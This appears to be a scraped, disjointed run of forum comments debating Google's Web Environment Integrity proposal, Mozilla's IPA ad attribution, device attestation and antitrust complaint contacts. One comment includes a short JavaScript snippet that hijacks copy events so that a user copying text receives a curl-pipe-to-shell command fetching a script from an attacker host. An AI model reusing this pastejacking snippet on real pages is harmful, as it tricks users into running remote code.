https://webkit.org/standards-positions/
(this one has not landed yet, likely to be opposed as well)
For example it is currently the reality in the EU, that in order to use any of the native banking apps, a user has no choice but to expose themselves to privacy violations by either Google or Apple, i.e. US companies.
While at least one alternative exists, https://grapheneos.org/articles/attestation-compatibility-gu..., these alternatives are not being used in practice.
I see no way of preventing this happening on the web as well, if the Web Environment Integrity API ships.
If you are shown a product ad whilst browsing searchengine.example and then later look up the product at reviews.example, then end up making a purchase at shop.example, your Mozilla browser will send all of these events to one or more aggregation services that allow shop.example to understand (at least in aggregate, assuming you trust the cartels running the aggregation services) that you were exposed to their product at searchengine.example and further exposed to their product at reviews.example.
Where previously an ad tech company was ultimately able to track users based on source IP address (even if cookies had been disabled by a user), IPA now allows these companies to track users across multiple IP addresses, and regardless of the user's cookie settings, via a unique tracking identifier. It is also proposed that the operating system provides the unique tracking identifier which can then be used by all applications or browsers on a device, allowing different devices behind a single IP address to be distinguished.
[1] https://github.com/mozilla/standards-positions/issues/753
[2] https://github.com/WebKit/standards-positions/issues/142
Either this protocol is useless for its intended purpose, or banks will only accept a small handful of attestors that promise not to sign for environments where the owner has control. Being able to create a new attestor means nothing because attestation is not valuable without pre-established trust.
The fraud prevention use case requires that the browser matches what Google or Mozilla shipped, not what I choose to actually run. From 10,000 feet in the sky, there's zero difference between, say, someone who installed modified software on their phone to protect their privacy and someone who was tricked into installing malware[0]. Banks don't care about your freedom, they care about making your fraud someone else's fault.
Some of the use cases explicitly call for locking the owner out of their device too. Anticheat in games is treated as at least beneficial to honest users, but it can still be user hostile[1]. Click fraud detection shouldn't even be something that a USER agent cares about - and it's not like Google cares about that anyway[2].
Practically speaking the only Linux distros that will get an attestor that anyone will actually care about will be Chrome OS and Play-certified Android. At best, Google agrees to attest for Chrome and Firefox on non-Chrome-OS Linux and it winds up being like EME did. At worst everyone has to buy a Windows license just to use most websites anymore.
>Assistive technologies will still work as the browsers implement platform's assistive APIs.
At least until someone says "we need to keep content from being data mined for AI training[3]" and AI scrapers find out how to automate those APIs. The underlying power dynamic of attestation means that websites can just demand attestors ban screen readers, in the same way that ebook DRM already does.
[0] Casual reminder that Louis Rossmann was harassed by the GrapheneOS developer for agreeing with someone that the developer asserted had harassed them. He uninstalled GrapheneOS specifically to avoid being pwned by its developer.
[1] Let me remind you of the insane cat-and-mouse game where cheaters went into the kernel, so now anticheat is in the kernel, and now cheaters find vulns in the anticheat to hide their cheats in, which now malware can use as well.
[2] https://www.theregister.com/2023/06/29/google_trueview_skept...
[3] Reddit
Most of these private attribution systems are specifically designed so that the people running the ad can count how many people clicked their ads, but not who clicked them or what other things they did. Safari had a proposal in which you could only have a certain number of campaigns running per domain, so you couldn't set up a separate """campaign""" for each user and fingerprint them all at once. I don't know how the Mozilla proposal differs.
Whether or not user-agents should care about this sort of thing is an orthogonal question.
[0] https://www.theregister.com/2023/06/29/google_trueview_skept...
[1] Remarketing in particular is responsible for the "feeling of being seen" from modern ads where you search for one thing and get 10,000 ads for the thing for the next week
https://github.com/gorhill/uBlock/wiki/uBlock-Origin-works-b...
Additionally, AntiFraudCG proposals such as WEI focus on benefits they provide to PATCG proposals. For example, a Googler with historical interest in minimising inflated view counts on YouTube[4] (a benefit to YouTube's advertisers) wrote earlier this year a proposal to AntiFraudCG including:
"By transmitting signals of legitimacy from the device’s platform, such as if the device is emulated or rooted, publishers and their technology partners could use this information in part to determine if traffic is invalid. They could then choose appropriate actions like flagging advertising actions as suspicious"[5]
[2] https://github.com/antifraudcg
[3] https://www.mozilla.org/en-US/mission/
[4] https://security.googleblog.com/2014/02/keeping-youtube-view...
Basic malware JavaScript snippet:
<script>
  // On copy from the #copy element, replace the clipboard contents
  // with a different string than the one the user selected.
  document.getElementById('copy').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain',
      'curl http://attacker-domain:8000/shell.sh | sh\n');
    e.preventDefault();
  });
</script>
[0] https://us.boell.org/en/2019/10/17/web-partner-companies-kee...
[1] https://tvpworld.com/40781592/another-letter-from-us-ambassa...
There's no reason your question couldn't have been posted in a relevant (sub)thread, instead of here, where it's (i) not on topic for the current subject, but (ii) looks like it could be, and therefore (iii) has the same effect as moving the goalposts.
[1] https://appleinsider.com/articles/12/07/25/apple_kills_windo...
"Firefox displayed a pop-up ad for Mozilla VPN over an unrelated page" (>>36077360 )
"Mozilla stops Firefox fullscreen VPN ads after user outrage" (>>36085642 )
That's another incident that just shouldn't have ever happened to begin with, in my opinion.
https://stackoverflow.com/questions/39533/how-to-identify-th...
Were you expecting only responses of praise for Mozilla, that users have been heard on WEI and therefore everyone can move on? Mozilla has invested resources together with Meta into developing the IPA proposal that also prioritises the needs of advertisers over users. The problem that IPA seeks to solve is:
"Advertisers need accurate reporting about how their ad campaigns are performing. Currently, businesses use data about the people who viewed their ads and bought their products to determine ‘return on ad spend’. But the ecosystem is moving towards more privacy and less personal data sharing."[1]
In Mozilla's response on WEI they've reiterated a commitment to working on solutions to the "invalid traffic" (e.g. ad click fraud) problem, a commitment which necessarily requires user needs to be suppressed. "Detecting fraud and invalid traffic is a challenging problem that we're interested in helping address."
Mozilla's response on IPA is therefore directly relevant to the discussion of public backlash for advertiser needs being prioritised over user needs. Mozilla is demonstrating inconsistency with RFC8890[2] and the priority of constituencies from the W3C Web Platform Design Principles[3] and numerous Ethical Web Principles[4]. Whilst these aren't adopted standards, they are a reflection of values of contributors to these standards organisations.
A further error of your framing is assuming WEI and IPA proposals can be meaningfully discussed in isolation of each other. With such framing, there is an avoidance of discussion of the combined impact of proposals if they were implemented together, or whether proposals such as IPA still make sense to pursue without WEI (or future equivalent proposal).
[1] https://docs.google.com/presentation/d/1NpQz0Wm73eEKw24V7B0y...
[2] https://www.rfc-editor.org/rfc/rfc8890.html
[3] https://www.w3.org/TR/design-principles/#priority-of-constit...
[4] https://www.w3.org/TR/ethical-web-principles/#control, https://www.w3.org/TR/ethical-web-principles/#multi, https://www.w3.org/TR/ethical-web-principles/#render
I know people want convenience. Anyone interested in convenience will just use Windows or macOS. They won't need to mess with VMs. This whole problem is only an issue for the small percentage of the population that wants to use their own weird operating systems, browsers, or addons.
If the need arises, someone will make a user friendly tool to do all this. Cassowary can do it today after following a step by step guide, they can also add their Web Integrity patches to those steps if they need to.
If you, as a user, want to have a special button that makes banking work without needing to know how or why, stick with proprietary operating systems. Linux isn't user friendly enough to accomplish this and it probably won't be for a while. The same is true if you want to watch your HD/4K streaming content without a huge struggle.
US:
- https://www.ftc.gov/enforcement/report-antitrust-violation
- antitrust@ftc.gov
EU:
- https://competition-policy.ec.europa.eu/antitrust/contact_en
- comp-greffe-antitrust@ec.europa.eu
UK:
- https://www.gov.uk/guidance/tell-the-cma-about-a-competition...
- general.enquiries@cma.gov.uk
India:
- https://www.cci.gov.in/antitrust/
- https://www.cci.gov.in/filing/atd
Canada:
- https://www.competitionbureau.gc.ca/eic/site/cb-bc.nsf/frm-e...